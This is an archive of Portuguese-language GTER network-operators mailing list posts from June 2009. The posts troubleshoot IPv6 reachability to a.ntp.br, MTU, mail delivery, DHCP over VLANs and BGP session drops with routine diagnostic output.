>> > 2001:12f8::253 > >> AS path: 22548 I >> > to 2001:12f8::1 via ge-0/2/0.20 >> [BGP/170] 1w3d 14:50:11, localpref 160, from >> 2001:12f8::254 >> AS path: 22548 I >> > to 2001:12f8::1 via ge-0/2/0.20 >> [BGP/170] 2d 10:08:00, MED 0, localpref 100 >> AS path: 3549 22548 I >> > to 2001:450:2002:cc::1 via ge-0/3/0.907 >> [BGP/170] 6w2d 20:04:43, localpref 100 >> AS path: 12956 27664 22548 I >> > to 2001:1498:1:a100:c1:6735:100:1 via >> > ge-0/2/0.4003 > >> {master} >> epafras at M10-SEMENTE-RE0> ping a.ntp.br >> PING6(56=40+8+8 bytes) 2001:12f8::24 --> 2001:12ff::8 >> ^C >> --- a.ntp.br ping6 statistics --- >> 10 packets transmitted, 0 packets received, 100% packet loss >> >> {master} >> epafras at M10-SEMENTE-RE0> >> >> Grande Abra?o, >> >> Epafras >> CTBC >> >> >> >> >> >> >> Re: [GTER] a.ntp.br via ipv6 nao funciona >> >> Eduardo Ascen?o Reis >> para: >> Grupo de Trabalho de Engenharia e Operacao de Redes >> 19/06/2009 11:25 >> >> >> Enviado por: >> gter-bounces at eng.registro.br >> Responda a Grupo de Trabalho de Engenharia e Operacao de Redes >> >> >> >> >> >> >> Caro Alexandre, >> >> Como bem colocado pelo Wilson, uma an?lise de conectividade IPv6 poder? >> nos >> ajudar nesse caso. >> >> 2009/6/19 Wilson Rogerio Lopes >> >> >>> Bem, antes de tudo, n?o custa ter certeza de que voc? tem >>> > conectividade > >> v6 >> >>> ao >>> servidor a.ntp.br >>> >>> $ ping6 a.ntp.br >>> PING6(56=40+8+8 bytes) 2001:12ff:0:2::4 --> 2001:12ff::8 >>> 16 bytes from 2001:12ff::8, icmp_seq=0 hlim=62 time=0.569 ms >>> 16 bytes from 2001:12ff::8, icmp_seq=1 hlim=62 time=0.666 ms >>> 16 bytes from 2001:12ff::8, icmp_seq=2 hlim=62 time=0.600 ms >>> >>> >> Por favor, informe (pela lista ou pvt) o endere?o IPv6 do seu host que >> est? >> fazendo os testes, e nos envie testes de ping6 e traceroute6 a partir >> > dele > >> para o a.ntp.br. Depois iremos fazer os testes no sentido inverso. >> >> Abra?os, >> >> -- >> >> Eduardo Ascen?o Reis >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- Sds. Alexandre Jeronimo Correa Onda Internet www.onda.net.br IPV6 Ready ! www.ipv6.onda.net.br ------------------------------ Message: 5 Date: Fri, 19 Jun 2009 13:48:47 -0300 From: epafras at ctbc.com.br Subject: Re: [GTER] a.ntp.br via ipv6 nao funciona To: Grupo de Trabalho de Engenharia e Operacao de Redes Cc: Grupo de Trabalho de Engenharia e Operacao de Redes , gter-bounces at eng.registro.br Message-ID: Content-Type: text/plain; charset="ISO-8859-1" Hummm.... agora funcionouuuu.... :-) {master} epafras at M10-SEMENTE-RE0> traceroute 2001:12ff::8 traceroute6 to 2001:12ff::8 (2001:12ff::8) from 2001:450:2002:cc::2, 64 hops max, 12 byte packets 1 2001:450:2002:cc::1 (2001:450:2002:cc::1) 17.332 ms 16.904 ms 16.660 ms 2 2001:450:2002:7f::2 (2001:450:2002:7f::2) 17.372 ms 17.130 ms 17.382 ms 3 ar01.bb1.registro.br (2001:12ff:2::228) 18.821 ms 17.918 ms 17.452 ms 4 2001:12ff:2:2::147 (2001:12ff:2:2::147) 17.329 ms 17.146 ms 17.175 ms 5 a.ntp.br (2001:12ff::8) 17.303 ms 17.182 ms 21.515 ms {master} epafras at M10-SEMENTE-RE0> Re: [GTER] a.ntp.br via ipv6 nao funciona Alexandre J. Correa - Onda Internet para: Grupo de Trabalho de Engenharia e Operacao de Redes 19/06/2009 13:37 Enviado por: gter-bounces at eng.registro.br Responda a Grupo de Trabalho de Engenharia e Operacao de Redes root at cube [/home/alexandre]# ping6 a.ntp.br PING a.ntp.br(a.ntp.br) 56 data bytes 64 bytes from a.ntp.br: icmp_seq=0 ttl=58 time=27.8 ms 64 bytes from a.ntp.br: icmp_seq=1 ttl=58 time=27.7 ms 64 bytes from a.ntp.br: icmp_seq=2 ttl=58 time=30.4 ms 64 bytes from a.ntp.br: icmp_seq=3 ttl=58 time=30.4 ms 64 bytes from a.ntp.br: icmp_seq=4 ttl=58 time=29.0 ms root at cube [/home/alexandre]# /usr/sbin/ntpdate -q -6 a.ntp.br server 2001:12ff::8, stratum 2, offset 0.071400, delay 0.04716 19 Jun 13:33:28 ntpdate[29780]: adjust time server 2001:12ff::8 offset 0.071400 sec root at cube [/home/alexandre]# /usr/sbin/ntpdate -6 a.ntp.br 19 Jun 13:33:38 ntpdate[29783]: no server suitable for synchronization found SQN-BRD-CTBC01#sh ipv6 route 2001:12ff:: IPv6 Routing Table - 1759 entries Codes: C - Connected, L - Local, S - Static, R - RIP, B - BGP U - Per-user Static route I1 - ISIS L1, I2 - ISIS L2, IA - ISIS interarea, IS - ISIS summary O - OSPF intra, OI - OSPF inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2 ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2 B 2001:12FF::/32 [20/0] via 2001:1291:1601::A root at cube [/home/alexandre]# traceroute 2001:12ff::8 traceroute to 2001:12ff::8 (2001:12ff::8), 30 hops max, 40 byte packets 1 2001:12ac::1 (2001:12ac::1) 2.086 ms 2.904 ms 4.739 ms 2 2001:1291:1601::a (2001:1291:1601::a) 9.267 ms 9.252 ms 9.259 ms 3 2001:450:2002:cc::1 (2001:450:2002:cc::1) 19.506 ms 19.627 ms 19.681 ms 4 2001:450:2002:7f::2 (2001:450:2002:7f::2) 19.917 ms 19.651 ms 19.704 ms 5 ar01.bb1.registro.br (2001:12ff:2::228) 21.422 ms 21.550 ms 21.601 ms 6 2001:12ff:2:2::147 (2001:12ff:2:2::147) 19.691 ms 19.218 ms 19.081 ms 7 a.ntp.br (2001:12ff::8) 18.955 ms 19.144 ms 19.235 ms epafras at ctbc.com.br wrote: > Fred, > > a.dns.br OK. > > epafras at M10-SEMENTE-RE0> ping a.dns.br > PING6(56=40+8+8 bytes) 2001:450:2002:cc::2 --> 2001:12ff::10 > 16 bytes from 2001:12ff::10, icmp_seq=0 hlim=60 time=17.244 ms > 16 bytes from 2001:12ff::10, icmp_seq=1 hlim=60 time=16.986 ms > 16 bytes from 2001:12ff::10, icmp_seq=2 hlim=60 time=17.257 ms > 16 bytes from 2001:12ff::10, icmp_seq=3 hlim=60 time=17.206 ms > ^C > --- a.dns.br ping6 statistics --- > 4 packets transmitted, 4 packets received, 0% packet loss > round-trip min/avg/max/std-dev = 16.986/17.173/17.257/0.110 ms > > {master} > epafras at M10-SEMENTE-RE0> > > {master} > epafras at M10-SEMENTE-RE0> telnet a.dns.br port 53 > Trying 2001:12ff::10... > Connected to a.dns.br. > Escape character is '^]'. > ^C^] > telnet> quit > Connection closed. > > {master} > epafras at M10-SEMENTE-RE0> > > Abs. > > Epafras > > > > > > > Re: [GTER] a.ntp.br via ipv6 nao funciona > > Frederico A C Neves > para: > Grupo de Trabalho de Engenharia e Operacao de Redes > 19/06/2009 12:10 > > > Enviado por: > gter-bounces at eng.registro.br > Responda a Grupo de Trabalho de Engenharia e Operacao de Redes > > > > > > > Epafras, > > Tem acesso v6 para a.dns.br ? > > % dig -6 @a.dns.br br soa > ; <<>> DiG 9.4.3-P1 <<>> -6 @a.dns.br br soa > ... > ;; Query time: 17 msec > ;; SERVER: 2001:12ff::10#53(2001:12ff::10) > ;; WHEN: Fri Jun 19 12:13:28 2009 > ;; MSG SIZE rcvd: 330 > > Fred > > On Fri, Jun 19, 2009 at 11:35:52AM -0300, epafras at ctbc.com.br wrote: > >> Fala Edu, >> >> Pra ajudar.... daqui eu n?o tenho conectividade com este IP... apesar >> > de > >> receber a rota... o traceroute para no PTT... veja... >> >> >> Meu IP de origem ? o da interface .... 2001:12f8::24/64 >> >> >> {master} >> epafras at M10-SEMENTE-RE0> traceroute a.ntp.br >> traceroute6 to a.ntp.br (2001:12ff::8) from 2001:12f8::24, 64 hops max, >> > 12 > >> byte packets >> 1 as22548.sp.ptt.br (2001:12f8::1) 20.039 ms 20.020 ms 19.946 ms >> 2 * * * >> 3 * * ^C >> {master} >> epafras at M10-SEMENTE-RE0> show route 2001:12ff::8 >> >> inet6.0: 1781 destinations, 3211 routes (1781 active, 0 holddown, 0 >> hidden) >> + = Active Route, - = Last Active, * = Both >> >> 2001:12ff::/32 *[BGP/170] 02:16:01, localpref 160, from >> > 2001:12f8::253 > >> AS path: 22548 I >> > to 2001:12f8::1 via ge-0/2/0.20 >> [BGP/170] 1w3d 14:50:11, localpref 160, from >> 2001:12f8::254 >> AS path: 22548 I >> > to 2001:12f8::1 via ge-0/2/0.20 >> [BGP/170] 2d 10:08:00, MED 0, localpref 100 >> AS path: 3549 22548 I >> > to 2001:450:2002:cc::1 via ge-0/3/0.907 >> [BGP/170] 6w2d 20:04:43, localpref 100 >> AS path: 12956 27664 22548 I >> > to 2001:1498:1:a100:c1:6735:100:1 via >> > ge-0/2/0.4003 > >> {master} >> epafras at M10-SEMENTE-RE0> ping a.ntp.br >> PING6(56=40+8+8 bytes) 2001:12f8::24 --> 2001:12ff::8 >> ^C >> --- a.ntp.br ping6 statistics --- >> 10 packets transmitted, 0 packets received, 100% packet loss >> >> {master} >> epafras at M10-SEMENTE-RE0> >> >> Grande Abra?o, >> >> Epafras >> CTBC >> >> >> >> >> >> >> Re: [GTER] a.ntp.br via ipv6 nao funciona >> >> Eduardo Ascen?o Reis >> para: >> Grupo de Trabalho de Engenharia e Operacao de Redes >> 19/06/2009 11:25 >> >> >> Enviado por: >> gter-bounces at eng.registro.br >> Responda a Grupo de Trabalho de Engenharia e Operacao de Redes >> >> >> >> >> >> >> Caro Alexandre, >> >> Como bem colocado pelo Wilson, uma an?lise de conectividade IPv6 poder? >> nos >> ajudar nesse caso. >> >> 2009/6/19 Wilson Rogerio Lopes >> >> >>> Bem, antes de tudo, n?o custa ter certeza de que voc? tem >>> > conectividade > >> v6 >> >>> ao >>> servidor a.ntp.br >>> >>> $ ping6 a.ntp.br >>> PING6(56=40+8+8 bytes) 2001:12ff:0:2::4 --> 2001:12ff::8 >>> 16 bytes from 2001:12ff::8, icmp_seq=0 hlim=62 time=0.569 ms >>> 16 bytes from 2001:12ff::8, icmp_seq=1 hlim=62 time=0.666 ms >>> 16 bytes from 2001:12ff::8, icmp_seq=2 hlim=62 time=0.600 ms >>> >>> >> Por favor, informe (pela lista ou pvt) o endere?o IPv6 do seu host que >> est? >> fazendo os testes, e nos envie testes de ping6 e traceroute6 a partir >> > dele > >> para o a.ntp.br. Depois iremos fazer os testes no sentido inverso. >> >> Abra?os, >> >> -- >> >> Eduardo Ascen?o Reis >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- Sds. Alexandre Jeronimo Correa Onda Internet www.onda.net.br IPV6 Ready ! www.ipv6.onda.net.br -- gter list https://eng.registro.br/mailman/listinfo/gter ------------------------------ -- gter digest list https://eng.registro.br/mailman/listinfo/gter End of gter Digest, Vol 75, Issue 70 ************************************ From lscrlstld at gmail.com Fri Jun 19 14:37:12 2009 From: lscrlstld at gmail.com (Toledo, Luis Carlos) Date: Fri, 19 Jun 2009 14:37:12 -0300 Subject: [GTER] RES: MTU x Telefonica In-Reply-To: References: <4A33AE1B.7010106@jarruda.com><20090617215546.GJ79676@registro.br><276fbe8b0906171531k46488e92r240a8314402fda7e@mail.gmail.com><4201a710906180848g1059ab61nccdcd8251cf728df@mail.gmail.com> Message-ID: <6D9CD292F24F444199B6CDB03B1669A9@toledoPC> Lembrando que o NAT ocupa um certo tamanho dentro do MTU > > PPPoE ? 1472 > > 2009/6/19 Giovane Heleno > > > Lulyis, > > > > Testei daqui at? os ips infomados no trace, e todos deram > 1500 de MTU. > > N?o est? ocorrendo com voc? por causa do PPPoE? > > Acredito que em PPPoE, o MTU ? menor mesmo. > > From renato.ornelas at gmail.com Fri Jun 19 14:34:46 2009 From: renato.ornelas at gmail.com (Renato Ornelas) Date: Fri, 19 Jun 2009 14:34:46 -0300 Subject: [GTER] Problemas para receber emails do terra Message-ID: Prezados, De uns tempos pra c?, venho enfrentando problemas para receber emails do terra. Uso o qmail. Logo ap?s o MAIL FROM, o servidor deles manda um EOF e o qmail manda um EOF de volta e termina a conex?o. 2009-06-19 14:21:14.623594500 tcpserver: pid 20664 from 208.84.243.188 2009-06-19 14:21:14.623925500 tcpserver: ok 20664 xxx.xxx:189.113.47.2:25if05-mail-fb04-mia.mta.terra.com:208 .84.243.188::49199 2009-06-19 14:21:14.625524500 20664 > 220 discovery.cityshop.com.br ESMTP 2009-06-19 14:21:14.763030500 20664 < EHLO if05-mail-fb04-mia.mta.terra.com 2009-06-19 14:21:14.763081500 20664 > 250-xxx.xxx 2009-06-19 14:21:14.763082500 20664 > 250-PIPELINING 2009-06-19 14:21:14.763083500 20664 > 250-8BITMIME 2009-06-19 14:21:14.763083500 20664 > 250-SIZE 0 2009-06-19 14:21:14.763084500 20664 > 250 AUTH LOGIN PLAIN 2009-06-19 14:21:14.901562500 20664 < MAIL FROM: SIZE=1929 BODY=7BIT 2009-06-19 14:21:14.901563500 20664 < RCPT TO: 2009-06-19 14:21:14.901563500 20664 < DATA 2009-06-19 14:22:14.910742500 20664 < [EOF] 2009-06-19 14:22:15.109687500 20664 > 250 ok 2009-06-19 14:22:15.109688500 20664 > 250 ok 2009-06-19 14:22:15.109688500 20664 > 354 go ahead 2009-06-19 14:22:15.109689500 tcpserver: end 20664 status 256 2009-06-19 14:22:15.109689500 20664 > [EOF] Tem mais alguem com este problema? Algu?m j? viu essa historia de mandar um EOF no meio do email? Renato Ornelas From epafras at ctbc.com.br Fri Jun 19 15:07:29 2009 From: epafras at ctbc.com.br (epafras at ctbc.com.br) Date: Fri, 19 Jun 2009 15:07:29 -0300 Subject: [GTER] a.ntp.br via ipv6 nao funciona In-Reply-To: <4A3BC581.7030007@cyberweb.com.br> Message-ID: Fala Juliano.. Ent?o.. aqui usamos o M10i. Pelo que me consta a arquitetura dele muito parecida com a do M40. O que sei que muda bastante ? com rela??o ao M120 / MX's que j? usam uma arquitetura um pouco diferente... que inclusive j? deu muida dor de cabe?a devido a sua estrutura com o novo "iCHIP".. mas estabilizou nas ultimas vers?es... Ainda assim, o M10i ? um pouquinho mais novo de estrada. ? uma caixa ?tima. O M10i aqui j? aguentou muita pancada. N?o me consta em n?meros de pps, mas algo em torno de 4Gbps fazendo roteamento e/iBGP (aproximadamente 7 sess?es Full BGP) + 1200 Rotas OSPF + LACP e por ai vai... No final, acredito que s?o duas ?timas caixas, mas devido ?s dimens?es, e at? pela quantidade de placas EOL, entre um M40 e um M320, fico com o M320. Tem as mesmas dimens?es f?sicas, mas 320Gbps de capacidade :-) Tem colegas na lista que podem ajudar melhor... fiquem a vontade... Abs. Epafras. gter-bounces at eng.registro.br wrote on 19/06/2009 14:06:09: > Re: [GTER] a.ntp.br via ipv6 nao funciona > > Juliano Primavesi - Cyberweb Networks > > para: > > Grupo de Trabalho de Engenharia e Operacao de Redes > > 19/06/2009 14:02 > > Enviado por: > > gter-bounces at eng.registro.br > > Responda a epafras, Grupo de Trabalho de Engenharia e Operacao de Redes > > Oi Epafras, > > A arquitetura do m10 ? parecida com m40? Quantos pps ele j? suportou na > ctbc? > > Juliano > > epafras at ctbc.com.br escreveu: > > Fred, > > > > a.dns.br OK. > > > > epafras at M10-SEMENTE-RE0> ping a.dns.br > > PING6(56=40+8+8 bytes) 2001:450:2002:cc::2 --> 2001:12ff::10 > > 16 bytes from 2001:12ff::10, icmp_seq=0 hlim=60 time=17.244 ms > > 16 bytes from 2001:12ff::10, icmp_seq=1 hlim=60 time=16.986 ms > > 16 bytes from 2001:12ff::10, icmp_seq=2 hlim=60 time=17.257 ms > > 16 bytes from 2001:12ff::10, icmp_seq=3 hlim=60 time=17.206 ms > > ^C > > --- a.dns.br ping6 statistics --- > > 4 packets transmitted, 4 packets received, 0% packet loss > > round-trip min/avg/max/std-dev = 16.986/17.173/17.257/0.110 ms > > > > {master} > > epafras at M10-SEMENTE-RE0> > > > > {master} > > epafras at M10-SEMENTE-RE0> telnet a.dns.br port 53 > > Trying 2001:12ff::10... > > Connected to a.dns.br. > > Escape character is '^]'. > > ^C^] > > telnet> quit > > Connection closed. > > > > {master} > > epafras at M10-SEMENTE-RE0> > > > > Abs. > > > > Epafras > > > > > > > > > > > > > > Re: [GTER] a.ntp.br via ipv6 nao funciona > > > > Frederico A C Neves > > para: > > Grupo de Trabalho de Engenharia e Operacao de Redes > > 19/06/2009 12:10 > > > > > > Enviado por: > > gter-bounces at eng.registro.br > > Responda a Grupo de Trabalho de Engenharia e Operacao de Redes > > > > > > > > > > > > > > Epafras, > > > > Tem acesso v6 para a.dns.br ? > > > > % dig -6 @a.dns.br br soa > > ; <<>> DiG 9.4.3-P1 <<>> -6 @a.dns.br br soa > > ... > > ;; Query time: 17 msec > > ;; SERVER: 2001:12ff::10#53(2001:12ff::10) > > ;; WHEN: Fri Jun 19 12:13:28 2009 > > ;; MSG SIZE rcvd: 330 > > > > Fred > > > > On Fri, Jun 19, 2009 at 11:35:52AM -0300, epafras at ctbc.com.br wrote: > > > >> Fala Edu, > >> > >> Pra ajudar.... daqui eu n?o tenho conectividade com este IP... apesar > >> > > de > > > >> receber a rota... o traceroute para no PTT... veja... > >> > >> > >> Meu IP de origem ? o da interface .... 2001:12f8::24/64 > >> > >> > >> {master} > >> epafras at M10-SEMENTE-RE0> traceroute a.ntp.br > >> traceroute6 to a.ntp.br (2001:12ff::8) from 2001:12f8::24, 64 hops max, > >> > > 12 > > > >> byte packets > >> 1 as22548.sp.ptt.br (2001:12f8::1) 20.039 ms 20.020 ms 19.946 ms > >> 2 * * * > >> 3 * * ^C > >> {master} > >> epafras at M10-SEMENTE-RE0> show route 2001:12ff::8 > >> > >> inet6.0: 1781 destinations, 3211 routes (1781 active, 0 holddown, 0 > >> hidden) > >> + = Active Route, - = Last Active, * = Both > >> > >> 2001:12ff::/32 *[BGP/170] 02:16:01, localpref 160, from > >> > > 2001:12f8::253 > > > >> AS path: 22548 I > >> > to 2001:12f8::1 via ge-0/2/0.20 > >> [BGP/170] 1w3d 14:50:11, localpref 160, from > >> 2001:12f8::254 > >> AS path: 22548 I > >> > to 2001:12f8::1 via ge-0/2/0.20 > >> [BGP/170] 2d 10:08:00, MED 0, localpref 100 > >> AS path: 3549 22548 I > >> > to 2001:450:2002:cc::1 via ge-0/3/0.907 > >> [BGP/170] 6w2d 20:04:43, localpref 100 > >> AS path: 12956 27664 22548 I > >> > to 2001:1498:1:a100:c1:6735:100:1 via > >> > > ge-0/2/0.4003 > > > >> {master} > >> epafras at M10-SEMENTE-RE0> ping a.ntp.br > >> PING6(56=40+8+8 bytes) 2001:12f8::24 --> 2001:12ff::8 > >> ^C > >> --- a.ntp.br ping6 statistics --- > >> 10 packets transmitted, 0 packets received, 100% packet loss > >> > >> {master} > >> epafras at M10-SEMENTE-RE0> > >> > >> Grande Abra?o, > >> > >> Epafras > >> CTBC > >> > >> > >> > >> > >> > >> > >> Re: [GTER] a.ntp.br via ipv6 nao funciona > >> > >> Eduardo Ascen?o Reis > >> para: > >> Grupo de Trabalho de Engenharia e Operacao de Redes > >> 19/06/2009 11:25 > >> > >> > >> Enviado por: > >> gter-bounces at eng.registro.br > >> Responda a Grupo de Trabalho de Engenharia e Operacao de Redes > >> > >> > >> > >> > >> > >> > >> Caro Alexandre, > >> > >> Como bem colocado pelo Wilson, uma an?lise de conectividade IPv6 poder? > >> nos > >> ajudar nesse caso. > >> > >> 2009/6/19 Wilson Rogerio Lopes > >> > >> > >>> Bem, antes de tudo, n?o custa ter certeza de que voc? tem > >>> > > conectividade > > > >> v6 > >> > >>> ao > >>> servidor a.ntp.br > >>> > >>> $ ping6 a.ntp.br > >>> PING6(56=40+8+8 bytes) 2001:12ff:0:2::4 --> 2001:12ff::8 > >>> 16 bytes from 2001:12ff::8, icmp_seq=0 hlim=62 time=0.569 ms > >>> 16 bytes from 2001:12ff::8, icmp_seq=1 hlim=62 time=0.666 ms > >>> 16 bytes from 2001:12ff::8, icmp_seq=2 hlim=62 time=0.600 ms > >>> > >>> > >> Por favor, informe (pela lista ou pvt) o endere?o IPv6 do seu host que > >> est? > >> fazendo os testes, e nos envie testes de ping6 e traceroute6 a partir > >> > > dele > > > >> para o a.ntp.br. Depois iremos fazer os testes no sentido inverso. > >> > >> Abra?os, > >> > >> -- > >> > >> Eduardo Ascen?o Reis > >> > >> -- > >> gter list https://eng.registro.br/mailman/listinfo/gter > >> > >> -- > >> gter list https://eng.registro.br/mailman/listinfo/gter > >> > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter From eschoedler at viavale.com.br Fri Jun 19 15:25:44 2009 From: eschoedler at viavale.com.br (Eduardo Schoedler) Date: Fri, 19 Jun 2009 15:25:44 -0300 Subject: [GTER] Problemas para receber emails do terra References: Message-ID: <4DDF3734A0E64C73B45780B6F6F84411@admgaz.com.br> Aqui uso link da Net Virtua. Um traceroute mostrou que para chegar nesse ip (208.84.243.188) estou indo pela EBT, cai na Level3 e depois na Telefonica USA. Telefonica tem dado muito problema ultimamente... Abra?o. ----- Original Message ----- From: "Renato Ornelas" To: "Grupo de Trabalho de Engenharia e Operacao de Redes" Sent: Friday, June 19, 2009 2:34 PM Subject: [GTER] Problemas para receber emails do terra Prezados, De uns tempos pra c?, venho enfrentando problemas para receber emails do terra. Uso o qmail. Logo ap?s o MAIL FROM, o servidor deles manda um EOF e o qmail manda um EOF de volta e termina a conex?o. 2009-06-19 14:21:14.623594500 tcpserver: pid 20664 from 208.84.243.188 2009-06-19 14:21:14.623925500 tcpserver: ok 20664 xxx.xxx:189.113.47.2:25if05-mail-fb04-mia.mta.terra.com:208 .84.243.188::49199 2009-06-19 14:21:14.625524500 20664 > 220 discovery.cityshop.com.br ESMTP 2009-06-19 14:21:14.763030500 20664 < EHLO if05-mail-fb04-mia.mta.terra.com 2009-06-19 14:21:14.763081500 20664 > 250-xxx.xxx 2009-06-19 14:21:14.763082500 20664 > 250-PIPELINING 2009-06-19 14:21:14.763083500 20664 > 250-8BITMIME 2009-06-19 14:21:14.763083500 20664 > 250-SIZE 0 2009-06-19 14:21:14.763084500 20664 > 250 AUTH LOGIN PLAIN 2009-06-19 14:21:14.901562500 20664 < MAIL FROM: SIZE=1929 BODY=7BIT 2009-06-19 14:21:14.901563500 20664 < RCPT TO: 2009-06-19 14:21:14.901563500 20664 < DATA 2009-06-19 14:22:14.910742500 20664 < [EOF] 2009-06-19 14:22:15.109687500 20664 > 250 ok 2009-06-19 14:22:15.109688500 20664 > 250 ok 2009-06-19 14:22:15.109688500 20664 > 354 go ahead 2009-06-19 14:22:15.109689500 tcpserver: end 20664 status 256 2009-06-19 14:22:15.109689500 20664 > [EOF] Tem mais alguem com este problema? Algu?m j? viu essa historia de mandar um EOF no meio do email? Renato Ornelas From cleber-listas at inetweb.com.br Fri Jun 19 16:06:59 2009 From: cleber-listas at inetweb.com.br (Cleber - Listas) Date: Fri, 19 Jun 2009 16:06:59 -0300 Subject: [GTER] RES: Problemas NET In-Reply-To: <50156.189.98.91.218.1245431312.squirrel@webmail.rlima.org> References: <50156.189.98.91.218.1245431312.squirrel@webmail.rlima.org> Message-ID: Rodrigo, Nosso acesso de Santana est? normal. N?o temos tb?m reclama??es de clientes com problemas via NET. Abra?os, Cleber -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Rodrigo Lima Enviada em: sexta-feira, 19 de junho de 2009 14:09 Para: gter at eng.registro.br Assunto: [GTER] Problemas NET Car?ssimos, Possu?mos um plano empresarial (DADOS/VOZ) por?m desde a madrugada o link de dados encontra-se literalmente OFF-LINE, previs?o de retorno segundo a NET era at? as 13:30, at? agora nada ! Algu?m mais est? com o mesmo problema, estamos em SP - CAPITAL, regi?o do Jabaquara. Forte abra?o, Rodrigo Lima -- gter list https://eng.registro.br/mailman/listinfo/gter Nenhum v?rus encontrado nessa mensagem recebida. Verificado por AVG - www.avgbrasil.com.br Vers?o: 8.5.339 / Banco de dados de v?rus: 270.12.80/2187 - Data de Lan?amento: 06/19/09 06:53:00 From guhcampos at gmail.com Fri Jun 19 16:28:30 2009 From: guhcampos at gmail.com (Gustavo Campos) Date: Fri, 19 Jun 2009 16:28:30 -0300 Subject: [GTER] Groupchat Message-ID: <19834d100906191228t1de51a8co102209da4e33d0fd@mail.gmail.com> Eu parei de receber o groupchat do evento, inclusive minhas pr?prias postagens... tem alguma coisa errada a?? -- Gustavo Campos Sistemas de Informa??o - UFMG From ivanfm.listas at gmail.com Fri Jun 19 16:33:38 2009 From: ivanfm.listas at gmail.com (Ivan Martinez) Date: Fri, 19 Jun 2009 16:33:38 -0300 Subject: [GTER] =?utf-8?q?Problema_com_DHCP_atrav=C3=A9s_de_VLANs?= In-Reply-To: <138bd4780906190708x4c1eeac2o13a54ffb002ac1be@mail.gmail.com> References: <138bd4780906190708x4c1eeac2o13a54ffb002ac1be@mail.gmail.com> Message-ID: Se essa porta trunk ? 1q, voc? poderia configurar no Astaro as VLANS e configurar cada rede no DHCP. Tenho um CentOS funcionando direitinho com multiplas redes em 1q em uma unica interface fisica. 2009/6/19 Francisco Henrique > Senhores, > estou com um problema onde eu trabalho, ? o seguinte: > > Tenho um servidor rodando o Astaro, onde em uma interface fisica TRUNK > ligada a um switch Dell eu tenho duas interfaces VLANs, uma com ID 101 e > outra com ID 201. > > Nesse mesmo switch chega uma fibra optica de um dos predios da institui??o, > onde existem duas subredes: 192.168.1.0/24 e 192.168.2.0/24. Essa fibra > optica ? conectada em outra interface TRUNK onde as VLANs 1, 101 e 201 s?o > aceitas. > > Minha inten??o era que os PCs da rede 192.168.1.0 ficassem na VLAN 101 e os > da 192.168.2.0 ficarem na 201. Mas no switch de acesso n?o existe e nem > pode > ter configura??o de VLAN, s? a porta TRUNK de uplink. > > No Astaro tem um cadastro de mapeamento de MACs, onde pra cada MAC existe > um determinado IP. Existe um servidor DHCP para cada rede. > > Eis a pergunta: > > Existe algum jeito desse servi?o de DHCP dar certo? > > Quando um PC faz um request de DHCP, o pacote vai com a marca??o 1, que ? > da > VLAN default de todos os switches, na hora que isso bate no Astaro, h? > alguma chance dele entregar o IP certo para o PC que fez o request? > > Est? confuso este cen?rio? Alguem pode me clarear a mente? > > ab?s > > > > -- > ============= > Francisco Henrique C. Ferreira > francisco.henrique at gmail.com > UIN: 5328093 > Linux Registered User #368514 > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From gui at maniacs.com.br Fri Jun 19 17:47:20 2009 From: gui at maniacs.com.br (Guilherme de Freitas Figueiredo) Date: Fri, 19 Jun 2009 17:47:20 -0300 Subject: [GTER] Queda Protocolo BGP Message-ID: <9c48850e0906191347j4d857eb7gc3aa6c97c6ba8b04@mail.gmail.com> Senhores, Fa?o uma interliga??o em layer2 para um cliente , interligo 2 filiais fechando em uma matriz , cada uma em um vlan diferente. N?o tenho relat?rio de perdas de pacote ( gero graficos das perdas utilizando smokeping ) , as negocia??es das ethernets est?o OK. N?o tenho colis?es e coloquei um equipamento meu na matriz e outro na filial fechando bgp. Resumo: a sess?o bgp do cliente cai de N em N minutos , a minha sess?o bgp permanece UP o cliente utiliza cisco para fechar o bgp , as sess?es caem nas 2 filiais ao mesmo tempo , e voltam depois do hold time. Alguem tem alguma ideia do que pode ser ? -- []s! -- Guilherme de Freitas Figueiredo - gui at maniacs.com.br - http://gui.maniacs.com.br From marcio.miguel+gter at gmail.com Fri Jun 19 20:10:56 2009 From: marcio.miguel+gter at gmail.com (Marcio Miguel) Date: Fri, 19 Jun 2009 20:10:56 -0300 Subject: [GTER] Queda Protocolo BGP In-Reply-To: <9c48850e0906191347j4d857eb7gc3aa6c97c6ba8b04@mail.gmail.com> References: <9c48850e0906191347j4d857eb7gc3aa6c97c6ba8b04@mail.gmail.com> Message-ID: <2f26b3450906191610g15a74d3foaac473de0f09ff28@mail.gmail.com> Este seus circuitos L2 suportam MTU maior que 1500 Bytes ? Uma Vlan 802.1Q utiliza 4 bytes a mais, e na hora dos updates isto pode causar problemas. Tente pingar as interfaces das filiais com pacotes de tamanho maior de 1500 bytes a partir de seu roteador. Verifique tamb?m se os hold-timers (e demais timers) est?o com valores iguais em todos os pontos. J? vi problemas tamb?m com ARP expirados, tive at? de for??-los estaticamente. Tudo isso assumindo que as camadas inferiores, inclusive as negocia??es das ethernets est?o realmente corretas e que os circuitos estejam com menos de 70 % de utiliza??o. M?rcio 2009/6/19 Guilherme de Freitas Figueiredo > Senhores, > > Fa?o uma interliga??o em layer2 para um cliente , interligo 2 filiais > fechando em uma matriz , cada uma em um vlan diferente. > N?o tenho relat?rio de perdas de pacote ( gero graficos das perdas > utilizando smokeping ) , as negocia??es das ethernets est?o OK. > N?o tenho colis?es e coloquei um equipamento meu na matriz e outro na > filial fechando bgp. > > Resumo: a sess?o bgp do cliente cai de N em N minutos , a minha sess?o bgp > permanece UP o cliente utiliza cisco para fechar o bgp , as sess?es caem > nas > 2 filiais ao mesmo tempo , e voltam depois do hold time. > > Alguem tem alguma ideia do que pode ser ? > > -- > []s! > > -- > 